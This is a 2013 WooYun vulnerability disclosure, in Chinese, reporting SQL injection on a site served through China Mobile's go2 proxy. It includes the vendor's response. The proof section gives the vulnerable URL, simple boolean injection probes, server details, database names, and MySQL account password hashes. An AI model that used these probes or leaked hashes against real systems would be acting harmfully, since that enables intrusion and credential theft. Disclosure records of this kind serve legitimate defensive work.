当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016904

漏洞标题:139移动互联某站字符过滤不严导致SQL注入,移动管理员密码泄露

相关厂商:139移动互联

漏洞作者: SLAckEr

提交时间:2013-01-04 11:04

修复时间:2013-02-18 11:05

公开时间:2013-02-18 11:05

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-04: 细节已通知厂商并且等待厂商处理中
2013-01-04: 厂商已经确认,细节仅向厂商公开
2013-01-14: 细节向核心白帽子及相关领域专家公开
2013-01-24: 细节向普通白帽子公开
2013-02-03: 细节向实习白帽子公开
2013-02-18: 细节向公众公开

简要描述:

139移动互联某站字符过滤不严导致SQL注入,root.

详细说明:

存在注入的页面http://go2.10086.cn/wap.at-gou.com/view.php?id=170
http://go2.10086.cn/wap.at-gou.com/view.php?id=170' 错误
http://go2.10086.cn/wap.at-gou.com/view.php?id=170 and 1=1 正确
http://go2.10086.cn/wap.at-gou.com/view.php?id=170 and 1=2 错误

漏洞证明:

Target: 		http://go2.10086.cn/wap.at-gou.com/view.php?id=170
Host IP: 112.4.12.88
Web Server: Apache/2.2.9 (APMServ) PHP/5.2.6
Powered-by: PHP/5.2.6
DB Server: MySQL error based
Resp. Time(avg): 207 ms
Current User: atgou@ac-35bb92c865b1
Sql Version: 5.1.28-rc-community
Current DB: memecha
System User: atgou@ac-35bb92c865b1
Host Name: ac-35bb92c865b1
Installation dir: D:\APMServ5.2.6\MySQL5.1
DB User & Pass: root:*CEF1763EFFC6FB9D1B5FDFBC4033E799E8A19AB1:%
root:*CEF1763EFFC6FB9D1B5FDFBC4033E799E8A19AB1:production
root:*CEF1763EFFC6FB9D1B5FDFBC4033E799E8A19AB1:127.0.0.1
tegou:*CEF1763EFFC6FB9D1B5FDFBC4033E799E8A19AB1:localhost
tegou:*CEF1763EFFC6FB9D1B5FDFBC4033E799E8A19AB1:%
atgou:*CEF1763EFFC6FB9D1B5FDFBC4033E799E8A19AB1:%
Data Bases: information_schema
baojian
memecha
mysql
taobiao
tegou
test
yaogou


1.png


2.png


3.png

修复方案:

你比我懂。

版权声明:转载请注明来源 SLAckEr@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-01-04 16:56

厂商回复:

CNVD确认并复现所述情况,但辨别后确认网站管理方非中国移动,只是网站经过中国移动go2服务进行了转码,形成的URL注入点事实上还是在某商业公司网站上。转由CNVD尝试通过公开渠道联系网站管理方处置。
暂不涉及网站用户信息泄露,rank 10

最新状态:

暂无


漏洞评价:

评论

  1. 2013-01-04 11:13 | 0x00de ( 路人 | Rank:8 漏洞数:6 | 一个二逼,2到家了的小白。)

    前排围观